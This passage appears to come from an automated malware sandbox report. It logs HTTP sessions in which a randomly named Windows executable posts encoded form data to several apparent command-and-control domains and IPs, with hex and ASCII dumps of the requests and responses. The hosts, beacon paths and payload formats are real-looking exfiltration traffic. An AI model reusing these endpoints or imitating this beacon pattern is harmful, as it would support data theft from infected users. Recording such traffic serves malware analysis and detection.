                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.449754107.163.130.24980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:11.261343002 CEST721OUTPOST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 77 6f 5a 43 77 62 76 38 57 47 30 30 78 54 31 46 63 39 54 38 4f 75 75 49 6c 6e 44 7a 57 37 77 43 6a 46 48 64 76 62 6a 55 63 72 34 38 34 63 6b 66 71 43 46 41 67 70 4a 79 31 2b 6e 51 42 59 34 43 68 59 32 35 5a 78 73 77 35 78 72 47 72 78 6e 59 73 69 37 52 70 48 41 66 43 4b 31 61 6a 54 36 75 51 36 37 6b 55 57 61 2b 55 48 45 41 56 71 2b 6b 52 2f 47 38 36 2f 5a 56 70 6e 6d 4d 4a 67 4d 6f 79 46 4f 67 38 34 7a 71 59 46 39 6e 4c 72 5a 31 62 32 51 39 37 6b 51 33 4e 66 34 45 51 6a 6c 72 6a 6a 75 75 52 7a 33 6b 57 36 41 70 38 34 75 6f 42 50 69 6a 6b 77 3d 3d
                                                      Data Ascii: N0spilI0=Hgj1voa8347XwoZCwbv8WG00xT1Fc9T8OuuIlnDzW7wCjFHdvbjUcr484ckfqCFAgpJy1+nQBY4ChY25Zxsw5xrGrxnYsi7RpHAfCK1ajT6uQ67kUWa+UHEAVq+kR/G86/ZVpnmMJgMoyFOg84zqYF9nLrZ1b2Q97kQ3Nf4EQjlrjjuuRz3kW6Ap84uoBPijkw==
                                                      Sep 25, 2024 05:37:12.115807056 CEST312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.449755107.163.130.24980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:13.813822031 CEST741OUTPOST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 7a 49 70 43 79 36 76 38 51 6d 30 7a 76 44 31 46 54 64 54 43 4f 75 69 49 6c 69 37 6a 57 49 45 43 6a 6c 33 64 75 61 6a 55 62 72 34 38 7a 38 6b 67 70 79 46 62 67 70 4e 51 31 37 66 51 42 59 73 43 68 63 79 35 5a 42 51 78 35 68 72 45 69 52 6e 61 6f 69 37 52 70 48 41 66 43 4c 51 48 6a 54 69 75 52 4c 4c 6b 62 54 32 39 5a 6e 45 44 63 4b 2b 6b 47 50 47 34 36 2f 5a 38 70 6a 6d 69 4a 6d 41 6f 79 45 2b 67 38 70 7a 72 4e 56 39 68 50 72 59 4c 54 47 74 45 37 57 68 32 43 2b 4d 6e 59 51 70 61 6d 6c 2f 30 41 43 57 7a 45 36 6b 61 68 2f 6e 63 4d 4d 66 71 2f 2b 6e 32 69 4e 67 33 46 62 6a 35 45 52 37 59 79 37 41 43 4e 70 73 3d
                                                      Data Ascii: N0spilI0=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWIECjl3duajUbr48z8kgpyFbgpNQ17fQBYsChcy5ZBQx5hrEiRnaoi7RpHAfCLQHjTiuRLLkbT29ZnEDcK+kGPG46/Z8pjmiJmAoyE+g8pzrNV9hPrYLTGtE7Wh2C+MnYQpaml/0ACWzE6kah/ncMMfq/+n2iNg3Fbj5ER7Yy7ACNps=
                                                      Sep 25, 2024 05:37:14.686585903 CEST312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.449756107.163.130.24980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:16.362880945 CEST10823OUTPOST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 67 6a 31 76 6f 61 38 33 34 37 58 7a 49 70 43 79 36 76 38 51 6d 30 7a 76 44 31 46 54 64 54 43 4f 75 69 49 6c 69 37 6a 57 4a 38 43 6a 57 2f 64 76 34 4c 55 61 72 34 38 77 38 6b 6c 70 79 46 61 67 74 70 55 31 37 62 66 42 61 55 43 68 2f 36 35 62 79 49 78 32 68 72 45 67 52 6e 62 73 69 37 45 70 48 51 62 43 4b 67 48 6a 54 69 75 52 49 6a 6b 66 47 61 39 62 6e 45 41 56 71 2b 34 52 2f 47 51 36 37 4e 47 70 6a 71 63 4a 32 67 6f 7a 6b 75 67 76 50 6e 72 51 6c 39 6a 43 4c 59 44 54 47 68 6c 37 57 74 41 43 2b 34 64 59 58 68 61 72 53 4b 72 45 51 6d 59 54 38 73 62 32 4f 2f 46 49 76 72 4f 7a 63 62 4a 74 38 38 35 51 71 62 69 47 67 4b 55 6a 37 30 6d 65 75 57 56 6a 45 36 6e 66 45 44 6e 4e 6f 66 6c 66 48 58 56 38 4b 30 77 59 42 6b 59 31 4a 55 6b 5a 36 45 48 74 2f 79 4f 47 51 34 55 6e 44 76 61 36 54 6b 2f 71 74 32 61 55 43 41 66 4b 58 6d 64 46 71 51 41 30 52 32 6e 38 6f 58 7a 4d 62 54 76 57 6e 6c 6d 6f 44 78 39 30 4c 44 38 44 6e 4c 34 44 73 51 2f 32 4f 4d 56 39 70 57 33 76 5a 6f 6b 6f 48 42 75 6c [TRUNCATED]
                                                      Data Ascii: N0spilI0=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWJ8CjW/dv4LUar48w8klpyFagtpU17bfBaUCh/65byIx2hrEgRnbsi7EpHQbCKgHjTiuRIjkfGa9bnEAVq+4R/GQ67NGpjqcJ2gozkugvPnrQl9jCLYDTGhl7WtAC+4dYXharSKrEQmYT8sb2O/FIvrOzcbJt885QqbiGgKUj70meuWVjE6nfEDnNoflfHXV8K0wYBkY1JUkZ6EHt/yOGQ4UnDva6Tk/qt2aUCAfKXmdFqQA0R2n8oXzMbTvWnlmoDx90LD8DnL4DsQ/2OMV9pW3vZokoHBulojmrqg/lzvrzUctoj4B9eIRBDdsO89YoLJIwcdRSGc72GKO6AG1we2Fpaggoj6uYl9jUkGIRjYq7ThDuCC958Fy/feRqau1iU8GkYcrArSBunjmT7N22xO8n2L1HeKkBOWixsmfQNuyywq5apnhXa0YgJW5U6lGOfkZiybY9YvRwdkCS22NOqDkPorUUKamqkN/ZXJkac0CJLA+Wd3GujZ0DHUrW7znzk7qEhZDje+1GBr8R9VAefu21JdULws5pMnTISgaBRgnVfSXQ9LfX4x2/WYeb7L+NMli7rz4lb/yjoVVweZes09V8xEY83kCihyfYyDIDK0GtEXLEfZdRtOhlZ6hsrwiY3uSu0L3n9vINx0fCynKtJDr/g8vNUD3ERNeiaOd5IHxOlB79qS9/b1AYLB+gsPJvVcL5A3gfgOY69xlQKf4Kt2nN9IFnusOqCt6WCa66ZL/mFfYTjLiDzcOiGP8kgdXX1jhp8voI0MwFYDV8M9WTbiotSqmlWpl3/fuLIO7tu3Y6lhaobPC2qKQnNGsoClNjRMNr0/JSjLSF9bWH+bCjWd7Z861ZRynojVneVBom0l9+sicUWXE2IRtYx/MNnvm35wm+fW7forFz20/uzATCBZbsgDTjycFyCIxAIo+tHg1zf33LomjHfHrvbhYc0Qvbqq [TRUNCATED]
                                                      Sep 25, 2024 05:37:17.435687065 CEST312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.449757107.163.130.24980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:18.902671099 CEST467OUTGET /jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:19.986435890 CEST312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.44975852.223.13.4180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:25.430480003 CEST739OUTPOST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 5a 58 4e 52 63 4c 74 76 54 56 69 31 43 54 50 76 6d 53 53 79 2b 48 52 6e 4b 71 6c 4e 63 43 4e 6d 2b 75 65 79 32 39 64 6f 47 74 48 74 38 34 50 4c 48 2f 48 54 56 42 2b 4a 52 30 44 53 38 50 46 67 57 48 50 45 34 4b 73 64 75 2f 2b 68 76 79 54 6b 61 53 79 67 55 71 72 66 58 4b 51 2b 72 45 65 30 74 48 6d 4c 73 42 39 6a 4f 66 42 69 56 32 47 58 4d 52 4d 43 43 6e 62 37 33 75 57 49 4e 70 62 38 5a 2b 32 37 6e 4b 4b 50 68 42 4f 37 76 63 76 4a 47 78 48 71 6d 52 42 66 52 47 77 46 75 47 4d 4d 59 4a 5a 47 6b 68 69 70 35 33 44 30 76 70 44 4f 2b 67 6f 5a 49 44 6d 32 2f 42 71 4c 71 32 43 4c 77 3d 3d
                                                      Data Ascii: N0spilI0=HZXNRcLtvTVi1CTPvmSSy+HRnKqlNcCNm+uey29doGtHt84PLH/HTVB+JR0DS8PFgWHPE4Ksdu/+hvyTkaSygUqrfXKQ+rEe0tHmLsB9jOfBiV2GXMRMCCnb73uWINpb8Z+27nKKPhBO7vcvJGxHqmRBfRGwFuGMMYJZGkhip53D0vpDO+goZIDm2/BqLq2CLw==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.44975952.223.13.4180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:27.966228962 CEST759OUTPOST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 5a 58 4e 52 63 4c 74 76 54 56 69 30 68 4c 50 70 46 71 53 6a 4f 48 65 72 71 71 6c 45 38 43 4a 6d 2b 69 65 79 33 34 59 6f 30 35 48 74 59 38 50 49 47 2f 48 66 31 42 2b 43 78 30 61 63 63 4f 4a 67 57 61 34 45 35 32 73 64 6f 54 2b 68 71 32 54 6b 74 2b 78 36 6b 71 70 58 33 4b 57 7a 4c 45 65 30 74 48 6d 4c 73 6b 67 6a 4e 76 42 69 6b 6d 47 57 70 78 50 4f 69 6e 63 34 33 75 57 4d 4e 70 68 38 5a 2f 5a 37 6a 72 64 50 6a 4a 4f 37 75 73 76 4b 54 64 49 7a 57 51 4b 42 52 48 45 56 4d 6e 51 4e 37 45 42 5a 6e 5a 77 73 72 62 31 34 4a 34 5a 66 50 42 2f 4c 49 6e 56 72 34 49 65 47 70 4c 4c 51 2f 32 58 33 34 33 35 32 32 36 6c 6e 66 4c 47 43 6d 2b 34 4d 44 59 3d
                                                      Data Ascii: N0spilI0=HZXNRcLtvTVi0hLPpFqSjOHerqqlE8CJm+iey34Yo05HtY8PIG/Hf1B+Cx0accOJgWa4E52sdoT+hq2Tkt+x6kqpX3KWzLEe0tHmLskgjNvBikmGWpxPOinc43uWMNph8Z/Z7jrdPjJO7usvKTdIzWQKBRHEVMnQN7EBZnZwsrb14J4ZfPB/LInVr4IeGpLLQ/2X3435226lnfLGCm+4MDY=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.44976052.223.13.4180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:30.514311075 CEST10841OUTPOST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 5a 58 4e 52 63 4c 74 76 54 56 69 30 68 4c 50 70 46 71 53 6a 4f 48 65 72 71 71 6c 45 38 43 4a 6d 2b 69 65 79 33 34 59 6f 30 68 48 71 74 6f 50 49 6b 58 48 52 56 42 2b 63 42 30 48 63 63 50 54 67 57 43 38 45 35 36 53 64 72 6e 2b 67 49 2b 54 69 59 4b 78 76 30 71 70 62 58 4b 58 2b 72 45 78 30 74 58 71 4c 73 55 67 6a 4e 76 42 69 6e 4f 47 56 38 52 50 49 69 6e 62 37 33 75 6b 49 4e 6f 76 38 66 57 75 37 6a 75 67 4f 53 70 4f 36 4f 38 76 4d 68 46 49 36 57 51 49 56 78 48 63 56 4d 72 35 4e 37 6f 4e 5a 6d 74 65 73 71 6a 31 72 6f 4e 30 4c 76 52 6a 51 36 37 51 32 72 38 59 43 72 6a 5a 66 34 79 71 32 6f 6a 43 68 53 2b 53 71 4f 37 4f 5a 45 57 2f 65 31 59 30 79 35 33 30 41 66 33 66 65 57 6d 42 61 52 53 6e 42 58 56 33 53 6c 48 6f 74 4f 68 6f 6f 6c 36 78 61 38 72 67 31 4b 5a 59 69 56 41 73 34 50 71 2b 43 52 64 66 44 4b 74 65 70 42 67 75 45 45 57 79 62 4c 52 73 4d 62 74 30 76 52 42 6e 6e 76 64 52 39 65 39 45 6c 37 38 48 78 4e 31 39 7a 6f 4d 64 35 6c 4a 39 79 61 39 68 44 39 4f 6b 36 73 49 59 2b [TRUNCATED]
                                                      Data Ascii: N0spilI0=HZXNRcLtvTVi0hLPpFqSjOHerqqlE8CJm+iey34Yo0hHqtoPIkXHRVB+cB0HccPTgWC8E56Sdrn+gI+TiYKxv0qpbXKX+rEx0tXqLsUgjNvBinOGV8RPIinb73ukINov8fWu7jugOSpO6O8vMhFI6WQIVxHcVMr5N7oNZmtesqj1roN0LvRjQ67Q2r8YCrjZf4yq2ojChS+SqO7OZEW/e1Y0y530Af3feWmBaRSnBXV3SlHotOhool6xa8rg1KZYiVAs4Pq+CRdfDKtepBguEEWybLRsMbt0vRBnnvdR9e9El78HxN19zoMd5lJ9ya9hD9Ok6sIY+sCxNnBN1oU1y8K1WGsVRbFHHHEQx5V1lC/699CkI3hBHyPWAXy7zgCt7DjZQ6XW6ud2HUalZLoz44ErMDNpu9ig2qJsRuqp8rKrkOwVXkS3UtHVRhk+IPqeoWvPHnRZjHoXwBDt2Eo9dM/gibSIRCgfJ+4AFYUVP9eUJK7UQRu5xS5EN0N9SaFIicvjWsZsIL1CwT0wiAipgupb8mN9S4IUJmF2kw7GdXsLTpsxy2knsUXgnLNiFmbKS/Tm53HuEMlWGVCN22w+3BlehyklPtHXMx5YSPGimCrpxjWj78QsPILUOYfpWlFUA2a5GqmEd9cQj9kt6zqgnEBwRElhZfIOYzRkNbh8xskCF4uMfZhTGOwAvE1MeJVhD5Ln6I8kgkC0mvYFX5erXXF/iNmqnDeqkf/ZuDh7MVkHXVP20hNi49BnRGTSQretpNOTYwd+NSVU+2wmSODeMxUoMF9rR+VaBuoj6+kzRNTec+Z+XNrUXDiv0zOGGwdgiit26vQKfHMReivV/5jEGSfdM1jPUSjOwqjJP5e/eba88FJ69Ks+o6wMEOK/vwj7DH7Cfd0nD497I94JgZuF6O9Fz4TRTOM6fg8SL0kAkYX83nZ4wf7mmxCMoTLah5WfGruuhrUvjCHPtb+0CaTGZTnSnhrYvPxrDzg68DdfXys [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.44976152.223.13.4180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:33.058896065 CEST473OUTGET /2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w= HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:33.539516926 CEST404INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:37:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 4b 62 2f 74 53 70 7a 6f 32 44 77 79 38 51 43 69 6b 32 50 43 72 38 2f 64 6c 50 32 62 42 4a 2b 6a 76 2b 65 70 31 6b 49 35 6a 43 77 75 73 63 51 51 65 6b 32 62 57 6b 6f 69 50 68 35 46 54 76 48 2b 6a 69 32 7a 46 4a 61 56 65 65 7a 50 70 6f 47 61 6a 4a 37 4b 6e 55 61 4f 57 47 54 4a 2f 71 70 6e 79 38 57 55 41 2b 73 76 69 74 44 63 77 45 4f 52 53 74 52 75 4e 31 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.449762103.21.221.480600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:39.013556004 CEST760OUTPOST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4c 69 53 65 4a 32 6c 59 6c 71 36 6e 71 4f 59 6b 73 36 4e 31 59 4a 67 73 54 74 4a 33 55 4c 30 69 51 4d 30 58 32 63 50 71 54 59 6a 70 71 46 51 56 69 72 48 77 54 61 67 75 4a 2f 2b 41 64 58 6a 44 38 6c 6d 47 41 6e 50 73 55 50 62 52 45 43 72 6b 50 64 76 44 75 52 30 75 78 64 6d 78 7a 66 56 43 78 52 5a 6b 35 53 36 70 52 4c 42 50 37 46 56 6f 5a 76 6e 64 4f 76 7a 55 65 51 51 37 63 56 6f 6f 73 57 39 39 37 63 5a 70 71 57 37 6f 69 73 63 68 76 61 48 2b 6d 48 64 58 73 44 44 49 61 4d 4f 6c 50 45 41 73 37 5a 64 65 6f 30 2b 78 30 36 62 6c 2f 62 35 74 77 51 3d 3d
